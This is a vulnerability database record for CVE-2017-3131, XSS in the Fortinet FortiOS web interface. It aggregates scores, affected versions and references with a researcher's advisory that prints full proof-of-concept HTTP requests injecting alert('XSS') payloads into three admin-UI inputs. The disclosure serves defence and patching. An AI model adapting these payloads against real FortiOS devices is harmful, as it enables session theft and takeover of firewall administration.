ID

VAR-201709-0475


CVE

CVE-2017-3131


TITLE

Fortinet FortiOS Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2017-007923

DESCRIPTION

A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.4.0 through 5.4.4 and 5.6.0 allows attackers to execute unauthorized code or commands via the filter input in "Applications" under FortiView. Fortinet FortiOS Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. FortiOS is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. # Title: FortiOS <= 5.6.0 Multiple XSS Vulnerabilities # Vendor: Fortinet (www.fortinet.com) # CVE: CVE-2017-3131, CVE-2017-3132, CVE-2017-3133 # Date: 28.07.2016 # Author: Patryk Bogdan (@patryk_bogdan) Affected FortiNet products: * CVE-2017-3131 : FortiOS versions 5.4.0 to 5.6.0 * CVE-2017-3132 : FortiOS versions upto 5.6.0 * CVE-2017-3133 : FortiOS versions upto 5.6.0 Fix: Upgrade to FortiOS version 5.6.1 Video PoC (add admin): https://youtu.be/fcpLStCD61Q Vendor advisory: https://fortiguard.com/psirt/FG-IR-17-104 Vulns: 1. XSS in WEB UI - Applications: URL: https://192.168.1.99/ng/fortiview/app/15832" onmouseover=alert('XSS') x="y Http request: GET /ng/fortiview/app/15832%22%20onmouseover=alert('XSS')%20x=%22y HTTP/1.1 Host: 192.168.1.99 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AZxzmYv40KrD1JvCdcctTzmuS+OEd08y+4Vh54tq%2Fap2ej%2F1gJfbaindJ5r4wDXZh%0A4q%2FfgVCdTfMFn+Mr6Xj5Og%3D%3D%0A%26AuthHash%3D9+TbiFXbk+Qkks0pPlkbNDx2L1EA%0A"; ccsrftoken_573485771="5424C6B3842788A23E3413307F1DFFC5"; ccsrftoken="5424C6B3842788A23E3413307F1DFFC5"; VDOM_573485771=root; csrftoken_573485771=da85e919f71a610c45aff174b23c7a10 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Http response: HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 12:07:47 GMT Server: xxxxxxxx-xxxxx Cache-Control: no-cache Pragma: no-cache Expires: -1 Vary: Accept-Encoding Content-Length: 6150 Connection: close Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-UA-Compatible: IE=Edge (...) <span class="fgd-app tooltip id_15832" onmouseover="alert('XSS')" x="y " data-address="undefined" data-dport="443" data-protocol="6"><a href="https://www.fortiguard.com/fos/15832" onclick="return false;" data-hasqtip="2"><span class="app_icon app15832" onmouseover="alert('XSS')" x="y"></span><label class="app_label" title="">15832" onmouseover=alert('XSS') x="y</label></a></span> (...) 2. XSS in WEB UI - Assign Token: URL: https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cscript%3E Http request: GET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3Cscript%3E HTTP/1.1 Host: 192.168.1.99 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0ALuXSfDjrp0Gel8F8TeKlBgC3kk4P1mhdELHr2Cicb3Zb6hBUnT9ZZnjXC44Dc7bD%0Ae2ymJG%2FgbHFa+4N9AVDIrg%3D%3D%0A%26AuthHash%3DMyJMLA32ueruHIEKia2eb9BWi8oA%0A"; ccsrftoken_573485771="314A25687F6B2075F9413405575D477"; ccsrftoken="314A25687F6B2075F9413405575D477"; VDOM_573485771=root; csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Http response: HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 13:39:17 GMT Server: xxxxxxxx-xxxxx Content-Security-Policy: frame-ancestors 'self' Expires: Thu, 23 Mar 2017 13:39:17 GMT Vary: Cookie,Accept-Encoding Last-Modified: Thu, 23 Mar 2017 13:39:17 GMT X-UA-Compatible: IE=Edge Cache-Control: max-age=0 X-FRAME-OPTIONS: SAMEORIGIN Set-Cookie: csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160; expires=Thu, 22-Mar-2018 13:39:17 GMT; Max-Age=31449600; Path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3485 (...) <script type="text/javascript"> var ftokens = []; var action = '</script><script>alert('XSS')</script><script>'; </script> </head> (...) 3. Stored XSS in WEB UI - Replacement Messages: #1 - Http request: POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1 Host: 192.168.1.99 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff X-Requested-With: XMLHttpRequest Content-Length: 125 Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D DNT: 1 Connection: close csrfmiddlewaretoken=d58f666c794024295cece8c5b8b6a3ff&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert('XSS')%3C%2Fscript%3E%0A #1 - Http response: HTTP/1.1 302 FOUND Date: Thu, 23 Mar 2017 15:36:33 GMT Server: xxxxxxxx-xxxxx Content-Security-Policy: frame-ancestors 'self' Expires: Thu, 23 Mar 2017 15:36:33 GMT Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT Cache-Control: max-age=0 X-FRAME-OPTIONS: SAMEORIGIN X-UA-Compatible: IE=Edge Set-Cookie: EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D; Path=/ Location: https://192.168.1.99/p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 0 #2 - Http request: GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1 Host: 192.168.1.99 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff X-Requested-With: XMLHttpRequest Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D DNT: 1 Connection: close #2 - Http response: HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 15:36:33 GMT Server: xxxxxxxx-xxxxx Content-Security-Policy: frame-ancestors 'self' Expires: Thu, 23 Mar 2017 15:36:33 GMT Vary: Cookie,Accept-Encoding Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT X-UA-Compatible: IE=Edge Cache-Control: max-age=0 X-FRAME-OPTIONS: SAMEORIGIN Set-Cookie: csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; expires=Thu, 22-Mar-2018 15:36:33 GMT; Max-Age=31449600; Path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 70940 (...) <form id="replacemsg_form"> <div style='display:none'><input type='hidden' name='csrfmiddlewaretoken' value='d58f666c794024295cece8c5b8b6a3ff' /></div> <textarea id="buffer" name="buffer">ABC</textarea> <script>alert('XSS')</script> </textarea> (...)

Trust: 2.07

sources: NVD: CVE-2017-3131 // JVNDB: JVNDB-2017-007923 // BID: 100009 // VULHUB: VHN-111334 // PACKETSTORM: 143543

AFFECTED PRODUCTS

vendor:fortinetmodel:fortiosscope:eqversion:5.6.0

Trust: 2.4

vendor:fortinetmodel:fortiosscope:eqversion:5.4.4

Trust: 1.9

vendor:fortinetmodel:fortiosscope:eqversion:5.4.3

Trust: 1.9

vendor:fortinetmodel:fortiosscope:eqversion:5.4.2

Trust: 1.9

vendor:fortinetmodel:fortiosscope:eqversion:5.4.1

Trust: 1.9

vendor:fortinetmodel:fortiosscope:eqversion:5.4.0

Trust: 1.9

vendor:fortinetmodel:fortiosscope:eqversion:5.4.0 to 5.4.4

Trust: 0.8

vendor:fortinetmodel:fortiosscope:eqversion:5.6

Trust: 0.3

vendor:fortinetmodel:fortiosscope:eqversion:5.4.5

Trust: 0.3

vendor:fortinetmodel:fortiosscope:eqversion:5.2.0

Trust: 0.3

vendor:fortinetmodel:fortiosscope:neversion:5.6.1

Trust: 0.3

sources: BID: 100009 // JVNDB: JVNDB-2017-007923 // CNNVD: CNNVD-201707-1511 // NVD: CVE-2017-3131

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2017-3131
value: MEDIUM

Trust: 1.0

NVD: CVE-2017-3131
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201707-1511
value: LOW

Trust: 0.6

VULHUB: VHN-111334
value: LOW

Trust: 0.1

nvd@nist.gov: CVE-2017-3131
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-111334
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2017-3131
baseSeverity: MEDIUM
baseScore: 5.4
vectorString: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.3
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: VULHUB: VHN-111334 // JVNDB: JVNDB-2017-007923 // CNNVD: CNNVD-201707-1511 // NVD: CVE-2017-3131

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-111334 // JVNDB: JVNDB-2017-007923 // NVD: CVE-2017-3131

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201707-1511

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 143543 // CNNVD: CNNVD-201707-1511

CONFIGURATIONS

sources: JVNDB: JVNDB-2017-007923

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-111334

PATCH

title:FG-IR-17-104url:http://fortiguard.com/psirt/FG-IR-17-104

Trust: 0.8

title:Fortinet FortiOS Fixes for cross-site scripting vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=72204

Trust: 0.6

sources: JVNDB: JVNDB-2017-007923 // CNNVD: CNNVD-201707-1511

EXTERNAL IDS

db:NVDid:CVE-2017-3131

Trust: 2.9

db:BIDid:100009

Trust: 2.0

db:SECTRACKid:1039020

Trust: 1.1

db:EXPLOIT-DBid:42388

Trust: 1.1

db:JVNDBid:JVNDB-2017-007923

Trust: 0.8

db:CNNVDid:CNNVD-201707-1511

Trust: 0.7

db:PACKETSTORMid:143543

Trust: 0.2

db:VULHUBid:VHN-111334

Trust: 0.1

sources: VULHUB: VHN-111334 // BID: 100009 // JVNDB: JVNDB-2017-007923 // PACKETSTORM: 143543 // CNNVD: CNNVD-201707-1511 // NVD: CVE-2017-3131

REFERENCES

url:http://www.securityfocus.com/bid/100009

Trust: 1.7

url:https://fortiguard.com/advisory/fg-ir-17-104

Trust: 1.7

url:https://www.exploit-db.com/exploits/42388/

Trust: 1.1

url:http://www.securitytracker.com/id/1039020

Trust: 1.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-3131

Trust: 0.9

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-3131

Trust: 0.8

url:http://fortiguard.com/psirt/fg-ir-17-104

Trust: 0.4

url:http://www.fortinet.com/

Trust: 0.3

url:https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3c/script%3e%3cscript%3ealert('xss')%3c/script%3e%3cscript%3e

Trust: 0.1

url:https://www.fortinet.com)

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-3133

Trust: 0.1

url:https://www.fortiguard.com/fos/15832"

Trust: 0.1

url:https://192.168.1.99/p/system/replacemsg-group/edit/none/sslvpn/sslvpn-login/

Trust: 0.1

url:https://youtu.be/fcplstcd61q

Trust: 0.1

url:https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-3132

Trust: 0.1

url:https://192.168.1.99/ng/fortiview/app/15832"

Trust: 0.1

sources: VULHUB: VHN-111334 // BID: 100009 // JVNDB: JVNDB-2017-007923 // PACKETSTORM: 143543 // CNNVD: CNNVD-201707-1511 // NVD: CVE-2017-3131

CREDITS

Patryk Bogdan of Secorda.

Trust: 0.9

sources: BID: 100009 // CNNVD: CNNVD-201707-1511

SOURCES

db:VULHUBid:VHN-111334
db:BIDid:100009
db:JVNDBid:JVNDB-2017-007923
db:PACKETSTORMid:143543
db:CNNVDid:CNNVD-201707-1511
db:NVDid:CVE-2017-3131

LAST UPDATE DATE

2024-11-23T22:07:16.156000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-111334date:2017-09-15T00:00:00
db:BIDid:100009date:2017-07-28T00:00:00
db:JVNDBid:JVNDB-2017-007923date:2017-10-04T00:00:00
db:CNNVDid:CNNVD-201707-1511date:2017-09-13T00:00:00
db:NVDid:CVE-2017-3131date:2024-11-21T03:24:53.780

SOURCES RELEASE DATE

db:VULHUBid:VHN-111334date:2017-09-12T00:00:00
db:BIDid:100009date:2017-07-28T00:00:00
db:JVNDBid:JVNDB-2017-007923date:2017-10-04T00:00:00
db:PACKETSTORMid:143543date:2017-07-28T19:22:22
db:CNNVDid:CNNVD-201707-1511date:2017-07-31T00:00:00
db:NVDid:CVE-2017-3131date:2017-09-12T02:29:00.203